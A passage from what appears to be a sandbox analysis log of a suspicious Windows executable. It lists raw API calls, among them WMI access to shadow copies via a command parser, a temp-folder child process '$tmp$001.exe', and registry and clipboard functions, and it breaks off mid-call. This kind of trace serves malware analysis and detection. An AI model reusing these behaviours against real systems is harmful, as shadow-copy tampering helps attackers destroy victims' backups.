lpString2="/", cchCount2=1) returned 3 [0104.017] lstrlenW (lpString="-") returned 1 [0104.017] lstrlenW (lpString="SHADOWCOPY") returned 10 [0104.017] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SHADOWCOPY", cchCount1=10, lpString2="-", cchCount2=1) returned 3 [0104.017] lstrlenW (lpString="CLASS") returned 5 [0104.017] lstrlenW (lpString="SHADOWCOPY") returned 10 [0104.017] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SHADOWCOPY", cchCount1=10, lpString2="CLASS", cchCount2=5) returned 3 [0104.017] lstrlenW (lpString="PATH") returned 4 [0104.017] lstrlenW (lpString="SHADOWCOPY") returned 10 [0104.017] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SHADOWCOPY", cchCount1=10, lpString2="PATH", cchCount2=4) returned 3 [0104.017] lstrlenW (lpString="CONTEXT") returned 7 [0104.017] lstrlenW (lpString="SHADOWCOPY") returned 10 [0104.017] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SHADOWCOPY", cchCount1=10, lpString2="CONTEXT", cchCount2=7) returned 3 [0104.017] lstrlenW (lpString="SHADOWCOPY") returned 10 [0104.017] malloc (_Size=0x16) returned 0x1aeb88 [0104.017] lstrlenW (lpString="SHADOWCOPY") returned 10 [0104.017] GetCurrentThreadId () returned 0x20c [0104.017] ??0CHString@@QAE@XZ () returned 0xcf85c [0104.017] malloc (_Size=0xc) returned 0x2312078 [0104.017] malloc (_Size=0xc) returned 0x23120a8 [0104.017] WbemLocator:IWbemLocator:ConnectServer (This=0x2000828, strNetworkResource="root\\cli", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xa3c1e0) Thread: id = 58 os_tid = 0x91c Thread: id = 65 os_tid = 0xa1c Thread: id = 66 os_tid = 0x600 Thread: id = 67 os_tid = 0xb64 Thread: id = 68 os_tid = 0xa10 Process: id = "16" image_name = "vssvc.exe" filename = "c:\\windows\\system32\\vssvc.exe" page_root = "0x44618000" os_pid = "0x7dc" os_integrity_level = "0x4000" os_privileges = "0xe60b7e890" monitor_reason = "rpc_server" parent_id = "14" 
os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\system32\\vssvc.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\VSS" [0xe], "NT AUTHORITY\\Logon Session 00000000:00061926" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 50 os_tid = 0xb0 Thread: id = 51 os_tid = 0xaec Thread: id = 52 os_tid = 0x7ac Thread: id = 53 os_tid = 0x408 [0092.400] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xebd840 | out: lpSystemTimeAsFileTime=0xebd840*(dwLowDateTime=0xf809a340, dwHighDateTime=0x1d61645)) [0092.401] GetCurrentProcessId () returned 0x7dc [0092.401] GetCurrentThreadId () returned 0x408 [0092.401] GetTickCount () returned 0x114bb06 [0092.401] QueryPerformanceCounter (in: lpPerformanceCount=0xebd848 | out: lpPerformanceCount=0xebd848*=21275536400) returned 1 [0092.401] malloc (_Size=0x100) returned 0x3a8e80 Thread: id = 54 os_tid = 0x40c Thread: id = 55 os_tid = 0x64 Thread: id = 56 os_tid = 0x5ac Thread: id = 57 os_tid = 0xa8c Process: id = "17" image_name = "$tmp$001.exe" filename = "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\$tmp$001.exe" page_root = "0x440c0000" os_pid = "0x5f4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "5" os_parent_pid = "0x620" cmd_line = "C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\$TMP$001.exe" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 
00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 59 os_tid = 0x5e4 [0100.745] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76d30000 [0100.749] GetProcAddress (hModule=0x76d30000, lpProcName="Sleep") returned 0x76d410ff [0100.749] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76d30000 [0100.749] GetProcAddress (hModule=0x76d30000, lpProcName="WriteFile") returned 0x76d41282 [0100.749] GetProcAddress (hModule=0x76d30000, lpProcName="WaitForSingleObject") returned 0x76d41136 [0100.750] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualQuery") returned 0x76d4445a [0100.750] GetProcAddress (hModule=0x76d30000, lpProcName="SetFilePointer") returned 0x76d417d1 [0100.750] GetProcAddress (hModule=0x76d30000, lpProcName="SetEvent") returned 0x76d416c5 [0100.750] GetProcAddress (hModule=0x76d30000, lpProcName="SetEndOfFile") returned 0x76d5ce2e [0100.750] GetProcAddress (hModule=0x76d30000, lpProcName="ResetEvent") returned 0x76d416dd [0100.753] GetProcAddress (hModule=0x76d30000, lpProcName="ReadFile") returned 0x76d43ed3 [0100.753] GetProcAddress (hModule=0x76d30000, lpProcName="MulDiv") returned 0x76d41b80 [0100.753] GetProcAddress (hModule=0x76d30000, lpProcName="LeaveCriticalSection") returned 0x77c62270 [0100.753] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSection") returned 0x77c72c42 [0100.753] GetProcAddress (hModule=0x76d30000, lpProcName="GlobalUnlock") returned 0x76d5cfdf [0100.753] GetProcAddress (hModule=0x76d30000, lpProcName="GlobalSize") returned 0x76d5d16f [0100.753] GetProcAddress (hModule=0x76d30000, lpProcName="GlobalLock") returned 0x76d5d0a7 [0100.754] GetProcAddress (hModule=0x76d30000, lpProcName="GlobalFree") returned 0x76d45558 [0100.754] GetProcAddress (hModule=0x76d30000, lpProcName="GlobalAlloc") returned 0x76d4588e [0100.754] GetProcAddress (hModule=0x76d30000, lpProcName="GetVersionExA") returned 0x76d43519 [0100.754] GetProcAddress 
(hModule=0x76d30000, lpProcName="GetUserDefaultLangID") returned 0x76d5d5fd [0100.754] GetProcAddress (hModule=0x76d30000, lpProcName="GetThreadLocale") returned 0x76d435cf [0100.754] GetProcAddress (hModule=0x76d30000, lpProcName="GetStringTypeExA") returned 0x76d68266 [0100.754] GetProcAddress (hModule=0x76d30000, lpProcName="GetStdHandle") returned 0x76d451b3 [0100.754] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcAddress") returned 0x76d41222 [0100.755] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleA") returned 0x76d41245 [0100.755] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleFileNameA") returned 0x76d414b1 [0100.755] GetProcAddress (hModule=0x76d30000, lpProcName="GetLocaleInfoA") returned 0x76d5d5e5 [0100.755] GetProcAddress (hModule=0x76d30000, lpProcName="GetLocalTime") returned 0x76d45aa6 [0100.755] GetProcAddress (hModule=0x76d30000, lpProcName="GetLastError") returned 0x76d411c0 [0100.755] GetProcAddress (hModule=0x76d30000, lpProcName="GetFullPathNameA") returned 0x76d4e2c1 [0100.755] GetProcAddress (hModule=0x76d30000, lpProcName="GetEnvironmentVariableA") returned 0x76d433a0 [0100.755] GetProcAddress (hModule=0x76d30000, lpProcName="GetDiskFreeSpaceA") returned 0x76dc433f [0100.755] GetProcAddress (hModule=0x76d30000, lpProcName="GetDateFormatA") returned 0x76d6a959 [0100.756] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentThreadId") returned 0x76d41450 [0100.756] GetProcAddress (hModule=0x76d30000, lpProcName="GetCPInfo") returned 0x76d45189 [0100.756] GetProcAddress (hModule=0x76d30000, lpProcName="GetACP") returned 0x76d4179c [0100.756] GetProcAddress (hModule=0x76d30000, lpProcName="FormatMessageA") returned 0x76d65fbd [0100.756] GetProcAddress (hModule=0x76d30000, lpProcName="FindFirstFileA") returned 0x76d4e2ce [0100.756] GetProcAddress (hModule=0x76d30000, lpProcName="FindClose") returned 0x76d44442 [0100.756] GetProcAddress (hModule=0x76d30000, lpProcName="FileTimeToLocalFileTime") returned 
0x76d4e29e [0100.756] GetProcAddress (hModule=0x76d30000, lpProcName="FileTimeToDosDateTime") returned 0x76d5c86d [0100.757] GetProcAddress (hModule=0x76d30000, lpProcName="ExitProcess") returned 0x76d47a10 [0100.757] GetProcAddress (hModule=0x76d30000, lpProcName="EnumCalendarInfoA") returned 0x76d69e70 [0100.757] GetProcAddress (hModule=0x76d30000, lpProcName="EnterCriticalSection") returned 0x77c622b0 [0100.757] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteFileA") returned 0x76d45444 [0100.757] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteCriticalSection") returned 0x77c745f5 [0100.757] GetProcAddress (hModule=0x76d30000, lpProcName="CreateMutexA") returned 0x76d44c6b [0100.757] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileA") returned 0x76d453c6 [0100.757] GetProcAddress (hModule=0x76d30000, lpProcName="CreateEventA") returned 0x76d4328c [0100.758] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileA") returned 0x76d658e5 [0100.758] GetProcAddress (hModule=0x76d30000, lpProcName="CompareStringA") returned 0x76d43c5a [0100.758] GetProcAddress (hModule=0x76d30000, lpProcName="CloseHandle") returned 0x76d41410 [0100.758] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76d30000 [0100.758] GetProcAddress (hModule=0x76d30000, lpProcName="TlsSetValue") returned 0x76d414fb [0100.758] GetProcAddress (hModule=0x76d30000, lpProcName="TlsGetValue") returned 0x76d411e0 [0100.758] GetProcAddress (hModule=0x76d30000, lpProcName="LocalAlloc") returned 0x76d4168c [0100.759] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleA") returned 0x76d41245 [0100.759] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76d30000 [0100.759] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteCriticalSection") returned 0x77c745f5 [0100.759] GetProcAddress (hModule=0x76d30000, lpProcName="LeaveCriticalSection") returned 0x77c62270 [0100.759] GetProcAddress (hModule=0x76d30000, lpProcName="EnterCriticalSection") returned 0x77c622b0 
[0100.759] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSection") returned 0x77c72c42 [0100.759] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualFree") returned 0x76d4186e [0100.759] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualAlloc") returned 0x76d41856 [0100.759] GetProcAddress (hModule=0x76d30000, lpProcName="LocalFree") returned 0x76d42d3c [0100.760] GetProcAddress (hModule=0x76d30000, lpProcName="LocalAlloc") returned 0x76d4168c [0100.760] GetProcAddress (hModule=0x76d30000, lpProcName="GetVersion") returned 0x76d44467 [0100.760] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentThreadId") returned 0x76d41450 [0100.760] GetProcAddress (hModule=0x76d30000, lpProcName="InterlockedDecrement") returned 0x76d413f0 [0100.760] GetProcAddress (hModule=0x76d30000, lpProcName="InterlockedIncrement") returned 0x76d41400 [0100.760] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualQuery") returned 0x76d4445a [0100.760] GetProcAddress (hModule=0x76d30000, lpProcName="WideCharToMultiByte") returned 0x76d4170d [0100.760] GetProcAddress (hModule=0x76d30000, lpProcName="MultiByteToWideChar") returned 0x76d4192e [0100.761] GetProcAddress (hModule=0x76d30000, lpProcName="lstrlenA") returned 0x76d45a4b [0100.761] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcpynA") returned 0x76d5192a [0100.761] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryExA") returned 0x76d44913 [0100.761] GetProcAddress (hModule=0x76d30000, lpProcName="GetThreadLocale") returned 0x76d435cf [0100.761] GetProcAddress (hModule=0x76d30000, lpProcName="GetStartupInfoA") returned 0x76d40e00 [0100.761] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcAddress") returned 0x76d41222 [0100.761] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleA") returned 0x76d41245 [0100.761] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleFileNameA") returned 0x76d414b1 [0100.761] GetProcAddress (hModule=0x76d30000, 
lpProcName="GetLocaleInfoA") returned 0x76d5d5e5 [0100.762] GetProcAddress (hModule=0x76d30000, lpProcName="GetCommandLineA") returned 0x76d451a1 [0100.762] GetProcAddress (hModule=0x76d30000, lpProcName="FreeLibrary") returned 0x76d434c8 [0100.762] GetProcAddress (hModule=0x76d30000, lpProcName="FindFirstFileA") returned 0x76d4e2ce [0100.762] GetProcAddress (hModule=0x76d30000, lpProcName="FindClose") returned 0x76d44442 [0100.762] GetProcAddress (hModule=0x76d30000, lpProcName="ExitProcess") returned 0x76d47a10 [0100.762] GetProcAddress (hModule=0x76d30000, lpProcName="WriteFile") returned 0x76d41282 [0100.762] GetProcAddress (hModule=0x76d30000, lpProcName="UnhandledExceptionFilter") returned 0x76d6772f [0100.762] GetProcAddress (hModule=0x76d30000, lpProcName="RtlUnwind") returned 0x76d6d1c3 [0100.762] GetProcAddress (hModule=0x76d30000, lpProcName="RaiseException") returned 0x76d458a6 [0100.763] GetProcAddress (hModule=0x76d30000, lpProcName="GetStdHandle") returned 0x76d451b3 [0100.763] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77710000 [0100.763] GetProcAddress (hModule=0x77710000, lpProcName="RegSetValueExA") returned 0x777214b3 [0100.763] GetProcAddress (hModule=0x77710000, lpProcName="RegCreateKeyExA") returned 0x77721469 [0100.763] GetProcAddress (hModule=0x77710000, lpProcName="RegCloseKey") returned 0x7772469d [0100.763] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77710000 [0100.763] GetProcAddress (hModule=0x77710000, lpProcName="RegQueryValueExA") returned 0x777248ef [0100.763] GetProcAddress (hModule=0x77710000, lpProcName="RegOpenKeyExA") returned 0x77724907 [0100.764] GetProcAddress (hModule=0x77710000, lpProcName="RegCloseKey") returned 0x7772469d [0100.764] LoadLibraryA (lpLibFileName="gdi32.dll") returned 0x770a0000 [0100.764] GetProcAddress (hModule=0x770a0000, lpProcName="UnrealizeObject") returned 0x770bc9ae [0100.764] GetProcAddress (hModule=0x770a0000, lpProcName="SetTextColor") returned 0x770b522d [0100.764] 
GetProcAddress (hModule=0x770a0000, lpProcName="SetROP2") returned 0x770bbc54 [0100.764] GetProcAddress (hModule=0x770a0000, lpProcName="SetBkMode") returned 0x770b51a2 [0100.764] GetProcAddress (hModule=0x770a0000, lpProcName="SetBkColor") returned 0x770b52d8 [0100.765] GetProcAddress (hModule=0x770a0000, lpProcName="SelectPalette") returned 0x770b5a86 [0100.765] GetProcAddress (hModule=0x770a0000, lpProcName="SelectObject") returned 0x770b4f70 [0100.765] GetProcAddress (hModule=0x770a0000, lpProcName="MoveToEx") returned 0x770b8ee6 [0100.765] GetProcAddress (hModule=0x770a0000, lpProcName="GetTextMetricsA") returned 0x770bd1f1 [0100.765] GetProcAddress (hModule=0x770a0000, lpProcName="GetSystemPaletteEntries") returned 0x770bcf02 [0100.765] GetProcAddress (hModule=0x770a0000, lpProcName="GetStockObject") returned 0x770b4eb8 [0100.765] GetProcAddress (hModule=0x770a0000, lpProcName="GetDeviceCaps") returned 0x770b4de0 [0100.765] GetProcAddress (hModule=0x770a0000, lpProcName="GetCurrentPositionEx") returned 0x770b908b [0100.765] GetProcAddress (hModule=0x770a0000, lpProcName="DeleteObject") returned 0x770b5689 [0100.765] GetProcAddress (hModule=0x770a0000, lpProcName="DeleteDC") returned 0x770b58b3 [0100.766] GetProcAddress (hModule=0x770a0000, lpProcName="CreatePenIndirect") returned 0x770c1feb [0100.766] GetProcAddress (hModule=0x770a0000, lpProcName="CreatePalette") returned 0x770b795a [0100.815] GetProcAddress (hModule=0x770a0000, lpProcName="CreateFontIndirectA") returned 0x770bcffd [0100.815] GetProcAddress (hModule=0x770a0000, lpProcName="CreateBrushIndirect") returned 0x770bb385 [0100.815] LoadLibraryA (lpLibFileName="oleaut32.dll") returned 0x76e40000 [0100.816] GetProcAddress (hModule=0x76e40000, lpProcName="SafeArrayPtrOfIndex") returned 0x76e5e1ce [0100.816] GetProcAddress (hModule=0x76e40000, lpProcName="SafeArrayGetUBound") returned 0x76e5e127 [0100.816] GetProcAddress (hModule=0x76e40000, lpProcName="SafeArrayGetLBound") returned 0x76e5e173 
[0100.816] GetProcAddress (hModule=0x76e40000, lpProcName="SafeArrayCreate") returned 0x76e5e263 [0100.816] GetProcAddress (hModule=0x76e40000, lpProcName="VariantChangeType") returned 0x76e45dee [0100.816] GetProcAddress (hModule=0x76e40000, lpProcName="VariantCopy") returned 0x76e448f1 [0100.816] GetProcAddress (hModule=0x76e40000, lpProcName="VariantClear") returned 0x76e43eae [0100.817] GetProcAddress (hModule=0x76e40000, lpProcName="VariantInit") returned 0x76e43ed5 [0100.817] LoadLibraryA (lpLibFileName="oleaut32.dll") returned 0x76e40000 [0100.817] GetProcAddress (hModule=0x76e40000, lpProcName="SysFreeString") returned 0x76e43e59 [0100.817] GetProcAddress (hModule=0x76e40000, lpProcName="SysReAllocStringLen") returned 0x76e47810 [0100.817] GetProcAddress (hModule=0x76e40000, lpProcName="SysAllocStringLen") returned 0x76e445d2 [0100.817] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x759d0000 [0100.817] GetProcAddress (hModule=0x759d0000, lpProcName="ShellExecuteA") returned 0x75c17078 [0100.817] LoadLibraryA (lpLibFileName="user32.dll") returned 0x77130000 [0100.817] GetProcAddress (hModule=0x77130000, lpProcName="SetClipboardData") returned 0x77188e57 [0100.817] GetProcAddress (hModule=0x77130000, lpProcName="ReleaseDC") returned 0x77147446 [0100.818] GetProcAddress (hModule=0x77130000, lpProcName="OpenClipboard") returned 0x77158ecb [0100.818] GetProcAddress (hModule=0x77130000, lpProcName="MessageBoxA") returned 0x7719fd1e [0100.818] GetProcAddress (hModule=0x77130000, lpProcName="LoadStringA") returned 0x7714db21 [0100.818] GetProcAddress (hModule=0x77130000, lpProcName="LoadIconA") returned 0x7714dafb [0100.818] GetProcAddress (hModule=0x77130000, lpProcName="GetSystemMetrics") returned 0x77147d2f [0100.818] GetProcAddress (hModule=0x77130000, lpProcName="GetSysColor") returned 0x77146c3c [0100.818] GetProcAddress (hModule=0x77130000, lpProcName="GetOpenClipboardWindow") returned 0x7715c468 [0100.818] GetProcAddress (hModule=0x77130000, 
lpProcName="GetDC") returned 0x771472c4 [0100.818] GetProcAddress (hModule=0x77130000, lpProcName="GetClipboardData") returned 0x77189f1d [0100.819] GetProcAddress (hModule=0x77130000, lpProcName="EmptyClipboard") returned 0x771a7cb9 [0100.819] GetProcAddress (hModule=0x77130000, lpProcName="CloseClipboard") returned 0x77158e8d [0100.819] GetProcAddress (hModule=0x77130000, lpProcName="CharNextA") returned 0x77147a1b [0100.819] GetProcAddress (hModule=0x77130000, lpProcName="CharUpperBuffA") returned 0x7714fe47 [0100.819] GetProcAddress (hModule=0x77130000, lpProcName="CharToOemA") returned 0x77154fee [0100.819] LoadLibraryA (lpLibFileName="user32.dll") returned 0x77130000 [0100.819] GetProcAddress (hModule=0x77130000, lpProcName="GetKeyboardType") returned 0x77189ac4 [0100.820] GetProcAddress (hModule=0x77130000, lpProcName="LoadStringA") returned 0x7714db21 [0100.820] GetProcAddress (hModule=0x77130000, lpProcName="MessageBoxA") returned 0x7719fd1e [0100.820] GetProcAddress (hModule=0x77130000, lpProcName="CharNextA") returned 0x77147a1b [0100.820] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x4, lpflOldProtect=0x18ff68 | out: lpflOldProtect=0x18ff68*=0x2) returned 1 [0100.820] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x2, lpflOldProtect=0x18ff68 | out: lpflOldProtect=0x18ff68*=0x4) returned 1 [0100.821] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0100.821] GetKeyboardType (nTypeFlag=0) returned 4 [0100.821] GetCommandLineA () returned="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\$TMP$001.exe" [0100.821] GetStartupInfoA (in: lpStartupInfo=0x18fef4 | out: lpStartupInfo=0x18fef4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\$TMP$001.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, 
hStdOutput=0xffffffff, hStdError=0xffffffff)) [0100.821] GetVersion () returned 0x1db10106 [0100.821] GetVersion () returned 0x1db10106 [0100.821] GetCurrentThreadId () returned 0x5e4 [0100.821] GetModuleFileNameA (in: hModule=0x400000, lpFilename=0x18f9f0, nSize=0x105 | out: lpFilename="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\$TMP$001.exe" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\$tmp$001.exe")) returned 0x31 [0100.821] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18f8cb, nSize=0x105 | out: lpFilename="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\$TMP$001.exe" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\$tmp$001.exe")) returned 0x31 [0100.821] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x18f9e0 | out: phkResult=0x18f9e0*=0x0) returned 0x2 [0100.821] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x18f9e0 | out: phkResult=0x18f9e0*=0x0) returned 0x2 [0100.822] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x18f9e0 | out: phkResult=0x18f9e0*=0x0) returned 0x2 [0100.822] lstrcpynA (in: lpString1=0x18f8cb, lpString2="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\$TMP$001.exe", iMaxLength=261 | out: lpString1="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\$TMP$001.exe") returned="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\$TMP$001.exe" [0100.822] GetThreadLocale () returned 0x409 [0100.822] GetLocaleInfoA (in: Locale=0x409, LCType=0x3, lpLCData=0x18f9db, cchData=5 | out: lpLCData="ENU") returned 4 [0100.823] lstrlenA (lpString="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\$TMP$001.exe") returned 49 [0100.823] lstrcpynA (in: lpString1=0x18f8f9, lpString2="ENU", iMaxLength=215 | out: lpString1="ENU") returned="ENU" [0100.823] LoadLibraryExA (lpLibFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\$TMP$001.ENU", 
hFile=0x0, dwFlags=0x2) returned 0x0 [0100.824] lstrcpynA (in: lpString1=0x18f8f9, lpString2="EN", iMaxLength=215 | out: lpString1="EN") returned="EN" [0100.824] LoadLibraryExA (lpLibFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\$TMP$001.EN", hFile=0x0, dwFlags=0x2) returned 0x0 [0100.824] LoadStringA (in: hInstance=0x400000, uID=0xffde, lpBuffer=0x18fb14, cchBufferMax=1024 | out: lpBuffer="Exception in safecall method") returned 0x1c [0100.824] LocalAlloc (uFlags=0x0, uBytes=0xff8) returned 0x545508 [0100.825] VirtualAlloc (lpAddress=0x0, dwSize=0x100000, flAllocationType=0x2000, flProtect=0x1) returned 0x430000 [0100.825] LocalAlloc (uFlags=0x0, uBytes=0x644) returned 0x546508 [0100.825] VirtualAlloc (lpAddress=0x430000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x430000 [0100.825] LoadStringA (in: hInstance=0x400000, uID=0xffdd, lpBuffer=0x18fb14, cchBufferMax=1024 | out: lpBuffer="Interface not supported") returned 0x17 [0100.825] LoadStringA (in: hInstance=0x400000, uID=0xffdb, lpBuffer=0x18fb14, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15 [0100.825] LoadStringA (in: hInstance=0x400000, uID=0xffdc, lpBuffer=0x18fb14, cchBufferMax=1024 | out: lpBuffer="Assertion failed") returned 0x10 [0100.826] LoadStringA (in: hInstance=0x400000, uID=0xffef, lpBuffer=0x18fb14, cchBufferMax=1024 | out: lpBuffer="Variant or safe array index out of bounds") returned 0x29 [0100.826] LoadStringA (in: hInstance=0x400000, uID=0xffd7, lpBuffer=0x18fb14, cchBufferMax=1024 | out: lpBuffer="Invalid argument") returned 0x10 [0100.826] LoadStringA (in: hInstance=0x400000, uID=0xffee, lpBuffer=0x18fb14, cchBufferMax=1024 | out: lpBuffer="Error creating variant or safe array") returned 0x24 [0100.826] LoadStringA (in: hInstance=0x400000, uID=0xffeb, lpBuffer=0x18fb14, cchBufferMax=1024 | out: lpBuffer="Variant method calls not supported") returned 0x22 [0100.826] LoadStringA (in: hInstance=0x400000, uID=0xffd2, lpBuffer=0x18fb14, 
cchBufferMax=1024 | out: lpBuffer="Invalid variant operation") returned 0x19 [0100.826] LoadStringA (in: hInstance=0x400000, uID=0xffd1, lpBuffer=0x18fb14, cchBufferMax=1024 | out: lpBuffer="Invalid variant type conversion") returned 0x1f [0100.826] LoadStringA (in: hInstance=0x400000, uID=0xffe4, lpBuffer=0x18fb14, cchBufferMax=1024 | out: lpBuffer="Stack overflow") returned 0xe [0100.826] LoadStringA (in: hInstance=0x400000, uID=0xffe5, lpBuffer=0x18fb14, cchBufferMax=1024 | out: lpBuffer="Control-C hit") returned 0xd [0100.826] LoadStringA (in: hInstance=0x400000, uID=0xffe6, lpBuffer=0x18fb14, cchBufferMax=1024 | out: lpBuffer="Privileged instruction") returned 0x16 [0100.826] LoadStringA (in: hInstance=0x400000, uID=0xffe3, lpBuffer=0x18fb14, cchBufferMax=1024 | out: lpBuffer="Access violation") returned 0x10 [0100.826] LoadStringA (in: hInstance=0x400000, uID=0xffe1, lpBuffer=0x18fb14, cchBufferMax=1024 | out: lpBuffer="Invalid class typecast") returned 0x16 [0100.826] LoadStringA (in: hInstance=0x400000, uID=0xffff, lpBuffer=0x18fb14, cchBufferMax=1024 | out: lpBuffer="Floating point underflow") returned 0x18 [0100.826] LoadStringA (in: hInstance=0x400000, uID=0xfffe, lpBuffer=0x18fb14, cchBufferMax=1024 | out: lpBuffer="Floating point overflow") returned 0x17 [0100.826] LoadStringA (in: hInstance=0x400000, uID=0xfffd, lpBuffer=0x18fb14, cchBufferMax=1024 | out: lpBuffer="Floating point division by zero") returned 0x1f [0100.826] LoadStringA (in: hInstance=0x400000, uID=0xfffc, lpBuffer=0x18fb14, cchBufferMax=1024 | out: lpBuffer="Invalid floating point operation") returned 0x20 [0100.826] LoadStringA (in: hInstance=0x400000, uID=0xfffb, lpBuffer=0x18fb14, cchBufferMax=1024 | out: lpBuffer="Integer overflow") returned 0x10 [0100.826] LoadStringA (in: hInstance=0x400000, uID=0xfffa, lpBuffer=0x18fb14, cchBufferMax=1024 | out: lpBuffer="Range check error") returned 0x11 [0100.826] LoadStringA (in: hInstance=0x400000, uID=0xfff9, lpBuffer=0x18fb14, 
cchBufferMax=1024 | out: lpBuffer="Division by zero") returned 0x10 [0100.826] LoadStringA (in: hInstance=0x400000, uID=0xfff8, lpBuffer=0x18fb14, cchBufferMax=1024 | out: lpBuffer="Invalid numeric input") returned 0x15 [0100.826] LoadStringA (in: hInstance=0x400000, uID=0xfff7, lpBuffer=0x18fb14, cchBufferMax=1024 | out: lpBuffer="Disk full") returned 0x9 [0100.826] LoadStringA (in: hInstance=0x400000, uID=0xfff6, lpBuffer=0x18fb14, cchBufferMax=1024 | out: lpBuffer="Read beyond end of file") returned 0x17 [0100.826] LoadStringA (in: hInstance=0x400000, uID=0xfff5, lpBuffer=0x18fb14, cchBufferMax=1024 | out: lpBuffer="File access denied") returned 0x12 [0100.826] LoadStringA (in: hInstance=0x400000, uID=0xfff4, lpBuffer=0x18fb14, cchBufferMax=1024 | out: lpBuffer="Too many open files") returned 0x13 [0100.826] LoadStringA (in: hInstance=0x400000, uID=0xfff3, lpBuffer=0x18fb14, cchBufferMax=1024 | out: lpBuffer="Invalid filename") returned 0x10 [0100.827] LoadStringA (in: hInstance=0x400000, uID=0xfff2, lpBuffer=0x18fb14, cchBufferMax=1024 | out: lpBuffer="File not found") returned 0xe [0100.827] LoadStringA (in: hInstance=0x400000, uID=0xfff0, lpBuffer=0x18fb00, cchBufferMax=1024 | out: lpBuffer="Out of memory") returned 0xd [0100.827] LoadStringA (in: hInstance=0x400000, uID=0xffe0, lpBuffer=0x18fb00, cchBufferMax=1024 | out: lpBuffer="Invalid pointer operation") returned 0x19 [0100.827] GetVersionExA (in: 